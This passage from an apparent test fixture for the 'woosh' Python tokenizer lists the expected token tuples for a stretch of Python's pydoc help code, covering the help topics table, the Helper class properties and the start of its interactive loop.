woosh.Token(woosh.OP, '(', 1957, 17, 1957, 18),
woosh.Token(woosh.STRING, "'calls'", 1957, 18, 1957, 25),
woosh.Token(woosh.OP, ',', 1957, 25, 1957, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1957, 27, 1957, 40),
woosh.Token(woosh.OP, ')', 1957, 40, 1957, 41),
woosh.Token(woosh.OP, ',', 1957, 41, 1957, 42),
woosh.Token(woosh.STRING, "'POWER'", 1958, 8, 1958, 15),
woosh.Token(woosh.OP, ':', 1958, 15, 1958, 16),
woosh.Token(woosh.OP, '(', 1958, 17, 1958, 18),
woosh.Token(woosh.STRING, "'power'", 1958, 18, 1958, 25),
woosh.Token(woosh.OP, ',', 1958, 25, 1958, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1958, 27, 1958, 40),
woosh.Token(woosh.OP, ')', 1958, 40, 1958, 41),
woosh.Token(woosh.OP, ',', 1958, 41, 1958, 42),
woosh.Token(woosh.STRING, "'UNARY'", 1959, 8, 1959, 15),
woosh.Token(woosh.OP, ':', 1959, 15, 1959, 16),
woosh.Token(woosh.OP, '(', 1959, 17, 1959, 18),
woosh.Token(woosh.STRING, "'unary'", 1959, 18, 1959, 25),
woosh.Token(woosh.OP, ',', 1959, 25, 1959, 26),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1959, 27, 1959, 40),
woosh.Token(woosh.OP, ')', 1959, 40, 1959, 41),
woosh.Token(woosh.OP, ',', 1959, 41, 1959, 42),
woosh.Token(woosh.STRING, "'BINARY'", 1960, 8, 1960, 16),
woosh.Token(woosh.OP, ':', 1960, 16, 1960, 17),
woosh.Token(woosh.OP, '(', 1960, 18, 1960, 19),
woosh.Token(woosh.STRING, "'binary'", 1960, 19, 1960, 27),
woosh.Token(woosh.OP, ',', 1960, 27, 1960, 28),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1960, 29, 1960, 42),
woosh.Token(woosh.OP, ')', 1960, 42, 1960, 43),
woosh.Token(woosh.OP, ',', 1960, 43, 1960, 44),
woosh.Token(woosh.STRING, "'SHIFTING'", 1961, 8, 1961, 18),
woosh.Token(woosh.OP, ':', 1961, 18, 1961, 19),
woosh.Token(woosh.OP, '(', 1961, 20, 1961, 21),
woosh.Token(woosh.STRING, "'shifting'", 1961, 21, 1961, 31),
woosh.Token(woosh.OP, ',', 1961, 31, 1961, 32),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1961, 33, 1961, 46),
woosh.Token(woosh.OP, ')', 1961, 46, 1961, 47),
woosh.Token(woosh.OP, ',', 1961, 47, 1961, 48),
woosh.Token(woosh.STRING, "'BITWISE'", 1962, 8, 1962, 17),
woosh.Token(woosh.OP, ':', 1962, 17, 1962, 18),
woosh.Token(woosh.OP, '(', 1962, 19, 1962, 20),
woosh.Token(woosh.STRING, "'bitwise'", 1962, 20, 1962, 29),
woosh.Token(woosh.OP, ',', 1962, 29, 1962, 30),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1962, 31, 1962, 44),
woosh.Token(woosh.OP, ')', 1962, 44, 1962, 45),
woosh.Token(woosh.OP, ',', 1962, 45, 1962, 46),
woosh.Token(woosh.STRING, "'COMPARISON'", 1963, 8, 1963, 20),
woosh.Token(woosh.OP, ':', 1963, 20, 1963, 21),
woosh.Token(woosh.OP, '(', 1963, 22, 1963, 23),
woosh.Token(woosh.STRING, "'comparisons'", 1963, 23, 1963, 36),
woosh.Token(woosh.OP, ',', 1963, 36, 1963, 37),
woosh.Token(woosh.STRING, "'EXPRESSIONS BASICMETHODS'", 1963, 38, 1963, 64),
woosh.Token(woosh.OP, ')', 1963, 64, 1963, 65),
woosh.Token(woosh.OP, ',', 1963, 65, 1963, 66),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1964, 8, 1964, 17),
woosh.Token(woosh.OP, ':', 1964, 17, 1964, 18),
woosh.Token(woosh.OP, '(', 1964, 19, 1964, 20),
woosh.Token(woosh.STRING, "'booleans'", 1964, 20, 1964, 30),
woosh.Token(woosh.OP, ',', 1964, 30, 1964, 31),
woosh.Token(woosh.STRING, "'EXPRESSIONS TRUTHVALUE'", 1964, 32, 1964, 56),
woosh.Token(woosh.OP, ')', 1964, 56, 1964, 57),
woosh.Token(woosh.OP, ',', 1964, 57, 1964, 58),
woosh.Token(woosh.STRING, "'ASSERTION'", 1965, 8, 1965, 19),
woosh.Token(woosh.OP, ':', 1965, 19, 1965, 20),
woosh.Token(woosh.STRING, "'assert'", 1965, 21, 1965, 29),
woosh.Token(woosh.OP, ',', 1965, 29, 1965, 30),
woosh.Token(woosh.STRING, "'ASSIGNMENT'", 1966, 8, 1966, 20),
woosh.Token(woosh.OP, ':', 1966, 20, 1966, 21),
woosh.Token(woosh.OP, '(', 1966, 22, 1966, 23),
woosh.Token(woosh.STRING, "'assignment'", 1966, 23, 1966, 35),
woosh.Token(woosh.OP, ',', 1966, 35, 1966, 36),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1966, 37, 1966, 58),
woosh.Token(woosh.OP, ')', 1966, 58, 1966, 59),
woosh.Token(woosh.OP, ',', 1966, 59, 1966, 60),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1967, 8, 1967, 29),
woosh.Token(woosh.OP, ':', 1967, 29, 1967, 30),
woosh.Token(woosh.OP, '(', 1967, 31, 1967, 32),
woosh.Token(woosh.STRING, "'augassign'", 1967, 32, 1967, 43),
woosh.Token(woosh.OP, ',', 1967, 43, 1967, 44),
woosh.Token(woosh.STRING, "'NUMBERMETHODS'", 1967, 45, 1967, 60),
woosh.Token(woosh.OP, ')', 1967, 60, 1967, 61),
woosh.Token(woosh.OP, ',', 1967, 61, 1967, 62),
woosh.Token(woosh.STRING, "'DELETION'", 1968, 8, 1968, 18),
woosh.Token(woosh.OP, ':', 1968, 18, 1968, 19),
woosh.Token(woosh.STRING, "'del'", 1968, 20, 1968, 25),
woosh.Token(woosh.OP, ',', 1968, 25, 1968, 26),
woosh.Token(woosh.STRING, "'RETURNING'", 1969, 8, 1969, 19),
woosh.Token(woosh.OP, ':', 1969, 19, 1969, 20),
woosh.Token(woosh.STRING, "'return'", 1969, 21, 1969, 29),
woosh.Token(woosh.OP, ',', 1969, 29, 1969, 30),
woosh.Token(woosh.STRING, "'IMPORTING'", 1970, 8, 1970, 19),
woosh.Token(woosh.OP, ':', 1970, 19, 1970, 20),
woosh.Token(woosh.STRING, "'import'", 1970, 21, 1970, 29),
woosh.Token(woosh.OP, ',', 1970, 29, 1970, 30),
woosh.Token(woosh.STRING, "'CONDITIONAL'", 1971, 8, 1971, 21),
woosh.Token(woosh.OP, ':', 1971, 21, 1971, 22),
woosh.Token(woosh.STRING, "'if'", 1971, 23, 1971, 27),
woosh.Token(woosh.OP, ',', 1971, 27, 1971, 28),
woosh.Token(woosh.STRING, "'LOOPING'", 1972, 8, 1972, 17),
woosh.Token(woosh.OP, ':', 1972, 17, 1972, 18),
woosh.Token(woosh.OP, '(', 1972, 19, 1972, 20),
woosh.Token(woosh.STRING, "'compound'", 1972, 20, 1972, 30),
woosh.Token(woosh.OP, ',', 1972, 30, 1972, 31),
woosh.Token(woosh.STRING, "'for while break continue'", 1972, 32, 1972, 58),
woosh.Token(woosh.OP, ')', 1972, 58, 1972, 59),
woosh.Token(woosh.OP, ',', 1972, 59, 1972, 60),
woosh.Token(woosh.STRING, "'TRUTHVALUE'", 1973, 8, 1973, 20),
woosh.Token(woosh.OP, ':', 1973, 20, 1973, 21),
woosh.Token(woosh.OP, '(', 1973, 22, 1973, 23),
woosh.Token(woosh.STRING, "'truth'", 1973, 23, 1973, 30),
woosh.Token(woosh.OP, ',', 1973, 30, 1973, 31),
woosh.Token(woosh.STRING, "'if while and or not BASICMETHODS'", 1973, 32, 1973, 66),
woosh.Token(woosh.OP, ')', 1973, 66, 1973, 67),
woosh.Token(woosh.OP, ',', 1973, 67, 1973, 68),
woosh.Token(woosh.STRING, "'DEBUGGING'", 1974, 8, 1974, 19),
woosh.Token(woosh.OP, ':', 1974, 19, 1974, 20),
woosh.Token(woosh.OP, '(', 1974, 21, 1974, 22),
woosh.Token(woosh.STRING, "'debugger'", 1974, 22, 1974, 32),
woosh.Token(woosh.OP, ',', 1974, 32, 1974, 33),
woosh.Token(woosh.STRING, "'pdb'", 1974, 34, 1974, 39),
woosh.Token(woosh.OP, ')', 1974, 39, 1974, 40),
woosh.Token(woosh.OP, ',', 1974, 40, 1974, 41),
woosh.Token(woosh.STRING, "'CONTEXTMANAGERS'", 1975, 8, 1975, 25),
woosh.Token(woosh.OP, ':', 1975, 25, 1975, 26),
woosh.Token(woosh.OP, '(', 1975, 27, 1975, 28),
woosh.Token(woosh.STRING, "'context-managers'", 1975, 28, 1975, 46),
woosh.Token(woosh.OP, ',', 1975, 46, 1975, 47),
woosh.Token(woosh.STRING, "'with'", 1975, 48, 1975, 54),
woosh.Token(woosh.OP, ')', 1975, 54, 1975, 55),
woosh.Token(woosh.OP, ',', 1975, 55, 1975, 56),
woosh.Token(woosh.OP, '}', 1976, 4, 1976, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1976, 5, 1977, 0),
woosh.Token(woosh.NAME, 'def', 1978, 4, 1978, 7),
woosh.Token(woosh.NAME, '__init__', 1978, 8, 1978, 16),
woosh.Token(woosh.OP, '(', 1978, 16, 1978, 17),
woosh.Token(woosh.NAME, 'self', 1978, 17, 1978, 21),
woosh.Token(woosh.OP, ',', 1978, 21, 1978, 22),
woosh.Token(woosh.NAME, 'input', 1978, 23, 1978, 28),
woosh.Token(woosh.OP, '=', 1978, 28, 1978, 29),
woosh.Token(woosh.NAME, 'None', 1978, 29, 1978, 33),
woosh.Token(woosh.OP, ',', 1978, 33, 1978, 34),
woosh.Token(woosh.NAME, 'output', 1978, 35, 1978, 41),
woosh.Token(woosh.OP, '=', 1978, 41, 1978, 42),
woosh.Token(woosh.NAME, 'None', 1978, 42, 1978, 46),
woosh.Token(woosh.OP, ')', 1978, 46, 1978, 47),
woosh.Token(woosh.OP, ':', 1978, 47, 1978, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1978, 48, 1979, 0),
woosh.Token(woosh.INDENT, ' ', 1979, 0, 1979, 8),
woosh.Token(woosh.NAME, 'self', 1979, 8, 1979, 12),
woosh.Token(woosh.OP, '.', 1979, 12, 1979, 13),
woosh.Token(woosh.NAME, '_input', 1979, 13, 1979, 19),
woosh.Token(woosh.OP, '=', 1979, 20, 1979, 21),
woosh.Token(woosh.NAME, 'input', 1979, 22, 1979, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1979, 27, 1980, 0),
woosh.Token(woosh.NAME, 'self', 1980, 8, 1980, 12),
woosh.Token(woosh.OP, '.', 1980, 12, 1980, 13),
woosh.Token(woosh.NAME, '_output', 1980, 13, 1980, 20),
woosh.Token(woosh.OP, '=', 1980, 21, 1980, 22),
woosh.Token(woosh.NAME, 'output', 1980, 23, 1980, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1980, 29, 1981, 0),
woosh.Token(woosh.DEDENT, ' ', 1982, 0, 1982, 4),
woosh.Token(woosh.OP, '@', 1982, 4, 1982, 5),
woosh.Token(woosh.NAME, 'property', 1982, 5, 1982, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1982, 13, 1983, 0),
woosh.Token(woosh.NAME, 'def', 1983, 4, 1983, 7),
woosh.Token(woosh.NAME, 'input', 1983, 8, 1983, 13),
woosh.Token(woosh.OP, '(', 1983, 13, 1983, 14),
woosh.Token(woosh.NAME, 'self', 1983, 14, 1983, 18),
woosh.Token(woosh.OP, ')', 1983, 18, 1983, 19),
woosh.Token(woosh.OP, ':', 1983, 19, 1983, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1983, 20, 1984, 0),
woosh.Token(woosh.INDENT, ' ', 1984, 0, 1984, 8),
woosh.Token(woosh.NAME, 'return', 1984, 8, 1984, 14),
woosh.Token(woosh.NAME, 'self', 1984, 15, 1984, 19),
woosh.Token(woosh.OP, '.', 1984, 19, 1984, 20),
woosh.Token(woosh.NAME, '_input', 1984, 20, 1984, 26),
woosh.Token(woosh.NAME, 'or', 1984, 27, 1984, 29),
woosh.Token(woosh.NAME, 'sys', 1984, 30, 1984, 33),
woosh.Token(woosh.OP, '.', 1984, 33, 1984, 34),
woosh.Token(woosh.NAME, 'stdin', 1984, 34, 1984, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1984, 39, 1985, 0),
woosh.Token(woosh.DEDENT, ' ', 1986, 0, 1986, 4),
woosh.Token(woosh.OP, '@', 1986, 4, 1986, 5),
woosh.Token(woosh.NAME, 'property', 1986, 5, 1986, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1986, 13, 1987, 0),
woosh.Token(woosh.NAME, 'def', 1987, 4, 1987, 7),
woosh.Token(woosh.NAME, 'output', 1987, 8, 1987, 14),
woosh.Token(woosh.OP, '(', 1987, 14, 1987, 15),
woosh.Token(woosh.NAME, 'self', 1987, 15, 1987, 19),
woosh.Token(woosh.OP, ')', 1987, 19, 1987, 20),
woosh.Token(woosh.OP, ':', 1987, 20, 1987, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1987, 21, 1988, 0),
woosh.Token(woosh.INDENT, ' ', 1988, 0, 1988, 8),
woosh.Token(woosh.NAME, 'return', 1988, 8, 1988, 14),
woosh.Token(woosh.NAME, 'self', 1988, 15, 1988, 19),
woosh.Token(woosh.OP, '.', 1988, 19, 1988, 20),
woosh.Token(woosh.NAME, '_output', 1988, 20, 1988, 27),
woosh.Token(woosh.NAME, 'or', 1988, 28, 1988, 30),
woosh.Token(woosh.NAME, 'sys', 1988, 31, 1988, 34),
woosh.Token(woosh.OP, '.', 1988, 34, 1988, 35),
woosh.Token(woosh.NAME, 'stdout', 1988, 35, 1988, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1988, 41, 1989, 0),
woosh.Token(woosh.DEDENT, ' ', 1990, 0, 1990, 4),
woosh.Token(woosh.NAME, 'def', 1990, 4, 1990, 7),
woosh.Token(woosh.NAME, '__repr__', 1990, 8, 1990, 16),
woosh.Token(woosh.OP, '(', 1990, 16, 1990, 17),
woosh.Token(woosh.NAME, 'self', 1990, 17, 1990, 21),
woosh.Token(woosh.OP, ')', 1990, 21, 1990, 22),
woosh.Token(woosh.OP, ':', 1990, 22, 1990, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1990, 23, 1991, 0),
woosh.Token(woosh.INDENT, ' ', 1991, 0, 1991, 8),
woosh.Token(woosh.NAME, 'if', 1991, 8, 1991, 10),
woosh.Token(woosh.NAME, 'inspect', 1991, 11, 1991, 18),
woosh.Token(woosh.OP, '.', 1991, 18, 1991, 19),
woosh.Token(woosh.NAME, 'stack', 1991, 19, 1991, 24),
woosh.Token(woosh.OP, '(', 1991, 24, 1991, 25),
woosh.Token(woosh.OP, ')', 1991, 25, 1991, 26),
woosh.Token(woosh.OP, '[', 1991, 26, 1991, 27),
woosh.Token(woosh.NUMBER, '1', 1991, 27, 1991, 28),
woosh.Token(woosh.OP, ']', 1991, 28, 1991, 29),
woosh.Token(woosh.OP, '[', 1991, 29, 1991, 30),
woosh.Token(woosh.NUMBER, '3', 1991, 30, 1991, 31),
woosh.Token(woosh.OP, ']', 1991, 31, 1991, 32),
woosh.Token(woosh.OP, '==', 1991, 33, 1991, 35),
woosh.Token(woosh.STRING, "'?'", 1991, 36, 1991, 39),
woosh.Token(woosh.OP, ':', 1991, 39, 1991, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1991, 40, 1992, 0),
woosh.Token(woosh.INDENT, ' ', 1992, 0, 1992, 12),
woosh.Token(woosh.NAME, 'self', 1992, 12, 1992, 16),
woosh.Token(woosh.OP, '(', 1992, 16, 1992, 17),
woosh.Token(woosh.OP, ')', 1992, 17, 1992, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1992, 18, 1993, 0),
woosh.Token(woosh.NAME, 'return', 1993, 12, 1993, 18),
woosh.Token(woosh.STRING, "''", 1993, 19, 1993, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1993, 21, 1994, 0),
woosh.Token(woosh.DEDENT, ' ', 1994, 0, 1994, 8),
woosh.Token(woosh.NAME, 'return', 1994, 8, 1994, 14),
woosh.Token(woosh.STRING, "'<%s.%s instance>'", 1994, 15, 1994, 33),
woosh.Token(woosh.OP, '%', 1994, 34, 1994, 35),
woosh.Token(woosh.OP, '(', 1994, 36, 1994, 37),
woosh.Token(woosh.NAME, 'self', 1994, 37, 1994, 41),
woosh.Token(woosh.OP, '.', 1994, 41, 1994, 42),
woosh.Token(woosh.NAME, '__class__', 1994, 42, 1994, 51),
woosh.Token(woosh.OP, '.', 1994, 51, 1994, 52),
woosh.Token(woosh.NAME, '__module__', 1994, 52, 1994, 62),
woosh.Token(woosh.OP, ',', 1994, 62, 1994, 63),
woosh.Token(woosh.NAME, 'self', 1995, 37, 1995, 41),
woosh.Token(woosh.OP, '.', 1995, 41, 1995, 42),
woosh.Token(woosh.NAME, '__class__', 1995, 42, 1995, 51),
woosh.Token(woosh.OP, '.', 1995, 51, 1995, 52),
woosh.Token(woosh.NAME, '__qualname__', 1995, 52, 1995, 64),
woosh.Token(woosh.OP, ')', 1995, 64, 1995, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1995, 65, 1996, 0),
woosh.Token(woosh.DEDENT, ' ', 1997, 0, 1997, 4),
woosh.Token(woosh.NAME, '_GoInteractive', 1997, 4, 1997, 18),
woosh.Token(woosh.OP, '=', 1997, 19, 1997, 20),
woosh.Token(woosh.NAME, 'object', 1997, 21, 1997, 27),
woosh.Token(woosh.OP, '(', 1997, 27, 1997, 28),
woosh.Token(woosh.OP, ')', 1997, 28, 1997, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1997, 29, 1998, 0),
woosh.Token(woosh.NAME, 'def', 1998, 4, 1998, 7),
woosh.Token(woosh.NAME, '__call__', 1998, 8, 1998, 16),
woosh.Token(woosh.OP, '(', 1998, 16, 1998, 17),
woosh.Token(woosh.NAME, 'self', 1998, 17, 1998, 21),
woosh.Token(woosh.OP, ',', 1998, 21, 1998, 22),
woosh.Token(woosh.NAME, 'request', 1998, 23, 1998, 30),
woosh.Token(woosh.OP, '=', 1998, 30, 1998, 31),
woosh.Token(woosh.NAME, '_GoInteractive', 1998, 31, 1998, 45),
woosh.Token(woosh.OP, ')', 1998, 45, 1998, 46),
woosh.Token(woosh.OP, ':', 1998, 46, 1998, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1998, 47, 1999, 0),
woosh.Token(woosh.INDENT, ' ', 1999, 0, 1999, 8),
woosh.Token(woosh.NAME, 'if', 1999, 8, 1999, 10),
woosh.Token(woosh.NAME, 'request', 1999, 11, 1999, 18),
woosh.Token(woosh.NAME, 'is', 1999, 19, 1999, 21),
woosh.Token(woosh.NAME, 'not', 1999, 22, 1999, 25),
woosh.Token(woosh.NAME, 'self', 1999, 26, 1999, 30),
woosh.Token(woosh.OP, '.', 1999, 30, 1999, 31),
woosh.Token(woosh.NAME, '_GoInteractive', 1999, 31, 1999, 45),
woosh.Token(woosh.OP, ':', 1999, 45, 1999, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1999, 46, 2000, 0),
woosh.Token(woosh.INDENT, ' ', 2000, 0, 2000, 12),
woosh.Token(woosh.NAME, 'self', 2000, 12, 2000, 16),
woosh.Token(woosh.OP, '.', 2000, 16, 2000, 17),
woosh.Token(woosh.NAME, 'help', 2000, 17, 2000, 21),
woosh.Token(woosh.OP, '(', 2000, 21, 2000, 22),
woosh.Token(woosh.NAME, 'request', 2000, 22, 2000, 29),
woosh.Token(woosh.OP, ')', 2000, 29, 2000, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2000, 30, 2001, 0),
woosh.Token(woosh.DEDENT, ' ', 2001, 0, 2001, 8),
woosh.Token(woosh.NAME, 'else', 2001, 8, 2001, 12),
woosh.Token(woosh.OP, ':', 2001, 12, 2001, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2001, 13, 2002, 0),
woosh.Token(woosh.INDENT, ' ', 2002, 0, 2002, 12),
woosh.Token(woosh.NAME, 'self', 2002, 12, 2002, 16),
woosh.Token(woosh.OP, '.', 2002, 16, 2002, 17),
woosh.Token(woosh.NAME, 'intro', 2002, 17, 2002, 22),
woosh.Token(woosh.OP, '(', 2002, 22, 2002, 23),
woosh.Token(woosh.OP, ')', 2002, 23, 2002, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2002, 24, 2003, 0),
woosh.Token(woosh.NAME, 'self', 2003, 12, 2003, 16),
woosh.Token(woosh.OP, '.', 2003, 16, 2003, 17),
woosh.Token(woosh.NAME, 'interact', 2003, 17, 2003, 25),
woosh.Token(woosh.OP, '(', 2003, 25, 2003, 26),
woosh.Token(woosh.OP, ')', 2003, 26, 2003, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2003, 27, 2004, 0),
woosh.Token(woosh.NAME, 'self', 2004, 12, 2004, 16),
woosh.Token(woosh.OP, '.', 2004, 16, 2004, 17),
woosh.Token(woosh.NAME, 'output', 2004, 17, 2004, 23),
woosh.Token(woosh.OP, '.', 2004, 23, 2004, 24),
woosh.Token(woosh.NAME, 'write', 2004, 24, 2004, 29),
woosh.Token(woosh.OP, '(', 2004, 29, 2004, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nYou are now leaving help and returning to the Python interpreter.\r\nIf you want to ask for help on a particular object directly from the\r\ninterpreter, you can type "help(object)". Executing "help(\'string\')"\r\nhas the same effect as typing a particular string at the help> prompt.\r\n\'\'\'', 2004, 30, 2009, 3),
woosh.Token(woosh.OP, ')', 2009, 3, 2009, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2009, 4, 2010, 0),
woosh.Token(woosh.DEDENT, ' ', 2011, 0, 2011, 4),
woosh.Token(woosh.DEDENT, '', 2011, 4, 2011, 4),
woosh.Token(woosh.NAME, 'def', 2011, 4, 2011, 7),
woosh.Token(woosh.NAME, 'interact', 2011, 8, 2011, 16),
woosh.Token(woosh.OP, '(', 2011, 16, 2011, 17),
woosh.Token(woosh.NAME, 'self', 2011, 17, 2011, 21),
woosh.Token(woosh.OP, ')', 2011, 21, 2011, 22),
woosh.Token(woosh.OP, ':', 2011, 22, 2011, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2011, 23, 2012, 0),
woosh.Token(woosh.INDENT, ' ', 2012, 0, 2012, 8),
woosh.Token(woosh.NAME, 'self', 2012, 8, 2012, 12),
woosh.Token(woosh.OP, '.', 2012, 12, 2012, 13),
woosh.Token(woosh.NAME, 'output', 2012, 13, 2012, 19),
woosh.Token(woosh.OP, '.', 2012, 19, 2012, 20),
woosh.Token(woosh.NAME, 'write', 2012, 20, 2012, 25),
woosh.Token(woosh.OP, '(', 2012, 25, 2012, 26),
woosh.Token(woosh.STRING, "'\\n'", 2012, 26, 2012, 30),
woosh.Token(woosh.OP, ')', 2012, 30, 2012, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2012, 31, 2013, 0),
woosh.Token(woosh.NAME, 'while', 2013, 8, 2013, 13),
woosh.Token(woosh.NAME, 'True', 2013, 14, 2013, 18),
woosh.Token(woosh.OP, ':', 2013, 18, 2013, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2013, 19, 2014, 0),
woosh.Token(woosh.INDENT, ' ', 2014, 0, 2014, 12),
woosh.Token(woosh.NAME, 'try', 2014, 12, 2014, 15),
woosh.Token(woosh.OP, ':', 2014, 15, 2014, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2014, 16, 2015, 0),
woosh.Token(woosh.INDENT, ' ', 2015, 0, 2015, 16),
woosh.Token(woosh.NAME, 'request', 2015, 16, 2015, 23),
woosh.Token(woosh.OP, '=', 2015, 24, 2015, 25),
woosh.Token(woosh.NAME, 'self', 2015, 26, 2015, 30),
woosh.Token(woosh.OP, '.', 2015, 30, 2015, 31),
woosh.Token(woosh.NAME, 'getline', 2015, 31, 2015, 38),
woosh.Token(woosh.OP, '(', 2015, 38, 2015, 39),
woosh.Token(woosh.STRING, "'help> '", 2015, 39, 2015, 47),
woosh.Token(woosh.OP, ')', 2015, 47, 2015, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2015, 48, 2016, 0),
woosh.Token(woosh.NAME, 'if', 2016, 16, 2016, 18),
woosh.Token(woosh.NAME, 'not', 2016, 19, 2016, 22),
woosh.Token(woosh.NAME, 'request', 2016, 23, 2016, 30),
woosh.Token(woosh.OP, ':', 2016, 30, 2016, 31),
woosh.Token(woosh.NAME, 'break', 2016, 32, 2016, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2016, 37, 2017, 0),
woosh.Token(woosh.DEDENT, ' ', 2017, 0, 2017, 12),
woosh.Token(woosh.NAME, 'except', 2017, 12, 2017, 18),
woosh.Token(woosh.OP, '(', 2017, 19, 2017, 20),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 2017, 20, 2017, 37),
woosh.Token(woosh.OP, ',', 2017, 37, 2017, 38),
woosh.Token(woosh.NAME, 'EOFError', 2017, 39, 2017, 47),
woosh.Token(woosh.OP, ')', 2017, 47, 2017, 48),
woosh.Token(woosh.OP, ':', 2017, 48, 2017, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2017, 49, 2018, 0),
woosh.Token(woosh.INDENT, ' ', 2018, 0, 2018, 16),
woosh.Token(woosh.NAME, 'break', 2018, 16, 2018, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2018, 21, 2019, 0),
woosh.Token(woosh.DEDENT, ' ', 2019, 0, 2019, 12),
woosh.Token(woosh.NAME, 'request', 2019, 12, 2019, 19),
woosh.Token(woosh.OP, '=', 2019, 20, 2019, 21),
woosh.Token(woosh.NAME, 'request', 2019, 22, 2019, 29),
woosh.Token(woosh.OP, '.', 2019, 29, 2019, 30),
woosh.Token(woosh.NAME, 'strip', 2019, 30, 2019, 35),
woosh.Token(woosh.OP, '(', 2019, 35, 2019, 36),
woosh.Token(woosh.OP, ')', 2019, 36, 2019, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2019, 37, 2020, 0),
woosh.Token(woosh.COMMENT, "# Make sure significant trailing quoting marks of literals don't", 2021, 12, 2021, 76),
woosh.Token(woosh.COMMENT, '# get deleted while cleaning input', 2022, 12, 2022, 46),
woosh.Token(woosh.NAME, 'if', 2023, 12, 2023, 14),
woosh.Token(woosh.OP, '(', 2023, 15, 2023, 16),
woosh.Token(woosh.NAME, 'len', 2023, 16, 2023, 19),
woosh.Token(woosh.OP, '(', 2023, 19, 2023, 20),
woosh.Token(woosh.NAME, 'request', 2023, 20, 2023, 27),
woosh.Token(woosh.OP, ')', 2023, 27, 2023, 28),
woosh.Token(woosh.OP, '>', 2023, 29, 2023, 30),
woosh.Token(woosh.NUMBER, '2', 2023, 31, 2023, 32),
woosh.Token(woosh.NAME, 'and', 2023, 33, 2023, 36),
woosh.Token(woosh.NAME, 'request', 2023, 37, 2023, 44),
woosh.Token(woosh.OP, '[', 2023, 44, 2023, 45),
woosh.Token(woosh.NUMBER, '0', 2023, 45, 2023, 46),
woosh.Token(woosh.OP, ']', 2023, 46, 2023, 47),
woosh.Token(woosh.OP, '==', 2023, 48, 2023, 50),
woosh.Token(woosh.NAME, 'request', 2023, 51, 2023, 58),
woosh.Token(woosh.OP, '[', 2023, 58, 2023, 59),
woosh.Token(woosh.OP, '-', 2023, 59, 2023, 60),
woosh.Token(woosh.NUMBER, '1', 2023, 60, 2023, 61),
woosh.Token(woosh.OP, ']', 2023, 61, 2023, 62),
woosh.Token(woosh.NAME, 'in', 2023, 63, 2023, 65),
woosh.Token(woosh.OP, '(', 2023, 66, 2023, 67),
woosh.Token(woosh.STRING, '"\'"', 2023, 67, 2023, 70),
woosh.Token(woosh.OP, ',', 2023, 70, 2023, 71),
woosh.Token(woosh.STRING, '\'"\'', 2023, 72, 2023, 75),
woosh.Token(woosh.OP, ')', 2023, 75, 2023, 76),
woosh.Token(woosh.NAME, 'and', 2024, 20, 2024, 23),
woosh.Token(woosh.NAME, 'request', 2024, 24, 2024, 31),
woosh.Token(woosh.OP, '[', 2024, 31, 2024, 32),
woosh.Token(woosh.NUMBER, '0', 2024, 32, 2024, 33),
woosh.Token(woosh.OP, ']', 2024, 33, 2024, 34),
woosh.Token(woosh.NAME, 'not', 2024, 35, 2024, 38),
woosh.Token(woosh.NAME, 'in', 2024, 39, 2024, 41),
woosh.Token(woosh.NAME, 'request', 2024, 42, 2024, 49),
woosh.Token(woosh.OP, '[', 2024, 49, 2024, 50),
woosh.Token(woosh.NUMBER, '1', 2024, 50, 2024, 51),
woosh.Token(woosh.OP, ':', 2024, 51, 2024, 52),
woosh.Token(woosh.OP, '-', 2024, 52, 2024, 53),
woosh.Token(woosh.NUMBER, '1', 2024, 53, 2024, 54),
woosh.Token(woosh.OP, ']', 2024, 54, 2024, 55),
woosh.Token(woosh.OP, ')', 2024, 55, 2024, 56),
woosh.Token(woosh.OP, ':', 2024, 56, 2024, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2024, 57, 2025, 0),
woosh.Token(woosh.INDENT, ' ', 2025, 0, 2025, 16),
woosh.Token(woosh.NAME, 'request', 2025, 16, 2025, 23),
woosh.Token(woosh.OP, '=', 2025, 24, 2025, 25),
woosh.Token(woosh.NAME, 'request', 2025, 26, 2025, 33),
woosh.Token(woosh.OP, '[', 2025, 33, 2025, 34),
woosh.Token(woosh.NUMBER, '1', 2025, 34, 2025, 35),
woosh.Token(woosh.OP, ':', 2025, 35, 2025, 36),
woosh.Token(woosh.OP, '-', 2025, 36, 2025, 37),
